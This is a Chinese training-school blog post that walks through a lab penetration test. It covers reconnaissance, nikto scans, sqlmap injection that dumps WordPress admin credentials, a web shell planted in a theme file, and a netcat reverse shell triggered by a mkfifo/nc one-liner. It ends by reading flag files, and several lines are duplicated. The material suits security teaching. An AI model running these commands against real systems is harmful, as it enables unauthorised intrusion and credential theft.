Java开发
课程针对企业需求实时更新
企业级项目精炼 助力高薪
揭秘渗透测试:渗透测试包括哪些?
来源: 汇智知了堂
发布:
知了姐
发布时间:
2024-03-19
在网络安全领域,渗透测试扮演着至关重要的角色。它是对计算机系统、网络或应用程序进行的一种安全评估方法,旨在发现潜在的安全漏洞和弱点。那么,渗透测试包括哪些关键步骤呢?
一、 信息收集
1、 网站页面
一、 信息收集
1、 网站页面
2、 网站信息收集
(1) 中间件信息收集
(1) 中间件信息收集
(2) 目录扫描
Phpmayadmin页面
http://192.168.7.37/phpmyadmin/
phpadmin版本
Phpadmin 目录泄露
Phpmyadmin安装页面(可用来重新安装数据库)
http://192.168.7.37/phpmyadmin/setup/index.php?token=6e19331abb366138f2ff9b0e84100587
http://192.168.7.37/phpmyadmin/setup/index.php?token=6e19331abb366138f2ff9b0e84100587
Phpadmin sql文件泄露
可以看到相关数据库的结构
http://192.168.7.37/phpmyadmin/sql/
可以看到相关数据库的结构
http://192.168.7.37/phpmyadmin/sql/
通过御剑扫描发现登录界面,估计像是有sql注入漏洞
http://192.168.7.37/login.php
http://192.168.7.37/login.php
3、 服务器信息收集
(1) Nmap扫描
发现有8080端口开着,访问一波
貌似是wordpress搭建的
到这里 靶场出问题了。。。。。以下是答案
3点击【Wordpress/】进行访问。进入该页面后发现8080端口搭建了WordPress平台。如下图所示
到这里 靶场出问题了。。。。。以下是答案
3点击【Wordpress/】进行访问。进入该页面后发现8080端口搭建了WordPress平台。如下图所示
在Terminal中输入“nikto –host http://192.168.200.116”对靶机进行扫描。得到登录界面。如下图所示。
输入“sqlmap –u http://192.168.200.116/login.php --form --level 3”,利用SQLmap进行检测,遇到选项则点击【Enter】键进行跳过,发现存在注入点。如下图所示。
输入“sqlmap –u “http://192.168.200.116/login.php” --form --level 3 --dbs”。进行注入得到数据库名。如下图所示。
得到数据库名wordpress8080。如下图所示。
输入“sqlmap –u ‘http://192.168.200.116/login.php’ --forms –D wordpress8080 --risk=3 --level=3 --tables”查看wordpress8080数据库中的内容。如下图所示。
查看users表中的内容 sqlmap -u http://192.168.200.116/login.php --form --level 3 -D wordpress8080 -T users --dump
用户名为:admin,密码为:SuperSecretPassword。 如下图所示。
用户名为:admin,密码为:SuperSecretPassword。 如下图所示。
Terminal中输入“nikto –host http://192.168.200.116:8080/wordpress”对wordpress进行扫描,根据结果可知后台登录网址为“192.168.200.116:8080/wordpress/wp-login.php”。如下图所示。
在Iceweasel浏览器地址栏中输入“192.168.200.116:8080/wordpress/wp-login.php”进行访问。如下图所示。
在【Username】中输入“admin”,在【Password】中输入“SuperSecretPassword”进行登录。如下图所示。
进入后台点击【Appearance】中的【Editor】。如下图所示。
对404.php进行修改,插入如下代码。如下图所示。
在Terminal中输入“nc –l –vv –p 9999”利用netcat进行监听。如下图所示。
在Iceweasel浏览器地址栏中输入“http://192.168.200.116:8080/wordpress/wp-content/themes/twentythirteen/404.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 192.168.3.31 9999 >/tmp/f”进行访问。如下图所示。
在Terminal中看到已经连接。如下图所示。
输入“ls”,发现flag.txt。如下图所示。
输入“cat flag.txt”查看flag.txt。如下图所示。
输入“cd /”进入根目录并输入“ls”查看发现flag.txt。如下图所示。
输入“cat flag.txt”查看flag.txt。如下图所示。
注:本文部分内容以及图片来源于网络,如网站发布的有关的信息侵犯到您的权益,请及时与我们取得联系删除
- 知了汇智培训课程
-
定制我的Java学习方案
-
网络安全培训
课程领先同行业机构至少三年
百万重金打造企业级攻防实验平台
定制我的网安学习方案 -
鸿蒙认证
容易学,应用到设备端全链条打通零基础
轻松晋级鸿蒙应用开发工程师
领取我的鸿蒙认证课程
